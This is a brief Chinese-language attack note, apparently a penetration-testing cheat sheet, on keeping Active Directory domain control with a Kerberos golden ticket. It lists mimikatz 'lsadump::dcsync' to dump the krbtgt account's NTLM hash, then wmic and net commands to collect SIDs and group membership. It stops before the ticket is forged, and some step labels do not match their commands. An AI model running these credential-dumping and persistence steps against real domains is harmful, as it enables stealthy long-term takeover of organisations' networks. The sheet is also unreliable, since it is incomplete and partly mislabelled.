利用黄金票据维持域内权限
环境:
1.域控主机的管理员账户 2.域内一台主机以及域成员用户
一、导出krbtgt的NTLM hash,用来伪造黄金票据
lsadump::dcsync /domain:[域名] /user:krbtgt
二、获取域SID
wmic useraccount get name,sid
三、获取当前用户的SID
net group “domain adminis” /domain
四、获取域内某个主机权限后,查看当前用户以及所诉组
net user wxw2 /domain